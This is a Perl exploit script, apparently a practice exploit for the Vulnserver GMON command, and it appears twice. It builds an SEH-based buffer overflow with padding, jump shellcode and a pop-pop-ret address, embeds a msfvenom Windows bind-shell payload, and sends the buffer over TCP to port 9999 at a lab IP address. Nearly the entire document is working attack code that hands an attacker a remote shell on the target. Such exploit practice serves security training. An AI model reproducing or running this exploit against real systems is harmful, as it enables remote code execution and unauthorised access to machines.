0xbadjuju/gmon.pl

## gmon.pl
#!/usr/bin/perl

use strict;
use warnings;

use Encode qw/encode/;
use Socket;

my $target = inet_aton("192.168.99.144");
my $port = 9999;
my $portaddr = sockaddr_in($port, $target);

my $header = "GMON /.:/";

#SEH chain of thread 000041A8, item 0
# Address=00FBFFDC
# SE handler=45336E45
#[*] Exact match at offset 3519

my $padding1 = "A" x 2914;

#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -b "\x00" -f perl
#355 bytes
my $payload =
"\xda\xd5\xbd\xd4\x17\x90\x69\xd9\x74\x24\xf4\x5a\x31\xc9" .
"\xb1\x53\x83\xc2\x04\x31\x6a\x13\x03\xbe\x04\x72\x9c\xc2" .
"\xc3\xf0\x5f\x3a\x14\x95\xd6\xdf\x25\x95\x8d\x94\x16\x25" .
"\xc5\xf8\x9a\xce\x8b\xe8\x29\xa2\x03\x1f\x99\x09\x72\x2e" .
"\x1a\x21\x46\x31\x98\x38\x9b\x91\xa1\xf2\xee\xd0\xe6\xef" .
"\x03\x80\xbf\x64\xb1\x34\xcb\x31\x0a\xbf\x87\xd4\x0a\x5c" .
"\x5f\xd6\x3b\xf3\xeb\x81\x9b\xf2\x38\xba\x95\xec\x5d\x87" .
"\x6c\x87\x96\x73\x6f\x41\xe7\x7c\xdc\xac\xc7\x8e\x1c\xe9" .
"\xe0\x70\x6b\x03\x13\x0c\x6c\xd0\x69\xca\xf9\xc2\xca\x99" .
"\x5a\x2e\xea\x4e\x3c\xa5\xe0\x3b\x4a\xe1\xe4\xba\x9f\x9a" .
"\x11\x36\x1e\x4c\x90\x0c\x05\x48\xf8\xd7\x24\xc9\xa4\xb6" .
"\x59\x09\x07\x66\xfc\x42\xaa\x73\x8d\x09\xa3\xb0\xbc\xb1" .
"\x33\xdf\xb7\xc2\x01\x40\x6c\x4c\x2a\x09\xaa\x8b\x4d\x20" .
"\x0a\x03\xb0\xcb\x6b\x0a\x77\x9f\x3b\x24\x5e\xa0\xd7\xb4" .
"\x5f\x75\x4d\xbc\xc6\x26\x70\x41\xb8\x96\x34\xe9\x51\xfd" .
"\xba\xd6\x42\xfe\x10\x7f\xea\x03\x9b\x6e\xb7\x8a\x7d\xfa" .
"\x57\xdb\xd6\x92\x95\x38\xef\x05\xe5\x6a\x47\xa1\xae\x7c" .
"\x50\xce\x2e\xab\xf6\x58\xa5\xb8\xc2\x79\xba\x94\x62\xee" .
"\x2d\x62\xe3\x5d\xcf\x73\x2e\x35\x6c\xe1\xb5\xc5\xfb\x1a" .
"\x62\x92\xac\xed\x7b\x76\x41\x57\xd2\x64\x98\x01\x1d\x2c" .
"\x47\xf2\xa0\xad\x0a\x4e\x87\xbd\xd2\x4f\x83\xe9\x8a\x19" .
"\x5d\x47\x6d\xf0\x2f\x31\x27\xaf\xf9\xd5\xbe\x83\x39\xa3" .
"\xbe\xc9\xcf\x4b\x0e\xa4\x89\x74\xbf\x20\x1e\x0d\xdd\xd0" .
"\xe1\xc4\x65\xe0\xab\x44\xcf\x69\x72\x1d\x4d\xf4\x85\xc8" .
"\x92\x01\x06\xf8\x6a\xf6\x16\x89\x6f\xb2\x90\x62\x02\xab" .
"\x74\x84\xb1\xcc\x5c";

my $padding3 = "D" x 120;

#JMP -517
#cat jmpfile.bin | msfvenom -a x86 --platform windows -f perl -b "\x00"
my $jmplong  =
"\xb8\x31\x08\xfb\x31\xda\xc3\xd9\x74\x24\xf4\x5b\x31\xc9" .
"\xb1\x05\x31\x43\x13\x83\xeb\xfc\x03\x43\x3e\xea\x0e\xe8" .
"\xae\x33\x84\x2f\xda\x9d\xe5\xf1\x28\x8e\x18\x3c\xd2\x63" .
"\x1b\x5e" .
"C" x 82;
#JMP -125
my $jmpshort = "\xeb\x80\x42\x42";
#0x625010b4 pop ebx; pop ebp; ret
#SEH chain of thread 000048C0, item 0
# Address=00F3FFDC
# SE handler=essfunc.625010B4
my $seh = "\xb4\x10\x50\x62";
my $padding2 = "C" x 473;

my $message = $header . $padding1 . $payload . $padding3 . $jmplong . $jmpshort . $seh . $padding2;

print $message . "\r\n";

socket(SOCKET,PF_INET,SOCK_STREAM,getprotobyname('tcp'))
	or die "Can't create a socket $!\n";

connect(SOCKET , $portaddr)
   	or die "Unable to connect to socket $!\n";

send(SOCKET, $message, 0) == length($message)
	or die "cannot send to $target($port): $!";

close SOCKET or die "close: $!";
	#!/usr/bin/perl

	use strict;
	use warnings;

	use Encode qw/encode/;
	use Socket;

	my $target = inet_aton("192.168.99.144");
	my $port = 9999;
	my $portaddr = sockaddr_in($port, $target);

	my $header = "GMON /.:/";

	#SEH chain of thread 000041A8, item 0
	# Address=00FBFFDC
	# SE handler=45336E45
	#[*] Exact match at offset 3519

	my $padding1 = "A" x 2914;

	#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp -b "\x00" -f perl
	#355 bytes
	my $payload =
	"\xda\xd5\xbd\xd4\x17\x90\x69\xd9\x74\x24\xf4\x5a\x31\xc9" .
	"\xb1\x53\x83\xc2\x04\x31\x6a\x13\x03\xbe\x04\x72\x9c\xc2" .
	"\xc3\xf0\x5f\x3a\x14\x95\xd6\xdf\x25\x95\x8d\x94\x16\x25" .
	"\xc5\xf8\x9a\xce\x8b\xe8\x29\xa2\x03\x1f\x99\x09\x72\x2e" .
	"\x1a\x21\x46\x31\x98\x38\x9b\x91\xa1\xf2\xee\xd0\xe6\xef" .
	"\x03\x80\xbf\x64\xb1\x34\xcb\x31\x0a\xbf\x87\xd4\x0a\x5c" .
	"\x5f\xd6\x3b\xf3\xeb\x81\x9b\xf2\x38\xba\x95\xec\x5d\x87" .
	"\x6c\x87\x96\x73\x6f\x41\xe7\x7c\xdc\xac\xc7\x8e\x1c\xe9" .
	"\xe0\x70\x6b\x03\x13\x0c\x6c\xd0\x69\xca\xf9\xc2\xca\x99" .
	"\x5a\x2e\xea\x4e\x3c\xa5\xe0\x3b\x4a\xe1\xe4\xba\x9f\x9a" .
	"\x11\x36\x1e\x4c\x90\x0c\x05\x48\xf8\xd7\x24\xc9\xa4\xb6" .
	"\x59\x09\x07\x66\xfc\x42\xaa\x73\x8d\x09\xa3\xb0\xbc\xb1" .
	"\x33\xdf\xb7\xc2\x01\x40\x6c\x4c\x2a\x09\xaa\x8b\x4d\x20" .
	"\x0a\x03\xb0\xcb\x6b\x0a\x77\x9f\x3b\x24\x5e\xa0\xd7\xb4" .
	"\x5f\x75\x4d\xbc\xc6\x26\x70\x41\xb8\x96\x34\xe9\x51\xfd" .
	"\xba\xd6\x42\xfe\x10\x7f\xea\x03\x9b\x6e\xb7\x8a\x7d\xfa" .
	"\x57\xdb\xd6\x92\x95\x38\xef\x05\xe5\x6a\x47\xa1\xae\x7c" .
	"\x50\xce\x2e\xab\xf6\x58\xa5\xb8\xc2\x79\xba\x94\x62\xee" .
	"\x2d\x62\xe3\x5d\xcf\x73\x2e\x35\x6c\xe1\xb5\xc5\xfb\x1a" .
	"\x62\x92\xac\xed\x7b\x76\x41\x57\xd2\x64\x98\x01\x1d\x2c" .
	"\x47\xf2\xa0\xad\x0a\x4e\x87\xbd\xd2\x4f\x83\xe9\x8a\x19" .
	"\x5d\x47\x6d\xf0\x2f\x31\x27\xaf\xf9\xd5\xbe\x83\x39\xa3" .
	"\xbe\xc9\xcf\x4b\x0e\xa4\x89\x74\xbf\x20\x1e\x0d\xdd\xd0" .
	"\xe1\xc4\x65\xe0\xab\x44\xcf\x69\x72\x1d\x4d\xf4\x85\xc8" .
	"\x92\x01\x06\xf8\x6a\xf6\x16\x89\x6f\xb2\x90\x62\x02\xab" .
	"\x74\x84\xb1\xcc\x5c";

	my $padding3 = "D" x 120;

	#JMP -517
	#cat jmpfile.bin \| msfvenom -a x86 --platform windows -f perl -b "\x00"
	my $jmplong =
	"\xb8\x31\x08\xfb\x31\xda\xc3\xd9\x74\x24\xf4\x5b\x31\xc9" .
	"\xb1\x05\x31\x43\x13\x83\xeb\xfc\x03\x43\x3e\xea\x0e\xe8" .
	"\xae\x33\x84\x2f\xda\x9d\xe5\xf1\x28\x8e\x18\x3c\xd2\x63" .
	"\x1b\x5e" .
	"C" x 82;
	#JMP -125
	my $jmpshort = "\xeb\x80\x42\x42";
	#0x625010b4 pop ebx; pop ebp; ret
	#SEH chain of thread 000048C0, item 0
	# Address=00F3FFDC
	# SE handler=essfunc.625010B4
	my $seh = "\xb4\x10\x50\x62";
	my $padding2 = "C" x 473;

	my $message = $header . $padding1 . $payload . $padding3 . $jmplong . $jmpshort . $seh . $padding2;

	print $message . "\r\n";

	socket(SOCKET,PF_INET,SOCK_STREAM,getprotobyname('tcp'))
	or die "Can't create a socket $!\n";

	connect(SOCKET , $portaddr)
	or die "Unable to connect to socket $!\n";

	send(SOCKET, $message, 0) == length($message)
	or die "cannot send to $target($port): $!";

	close SOCKET or die "close: $!";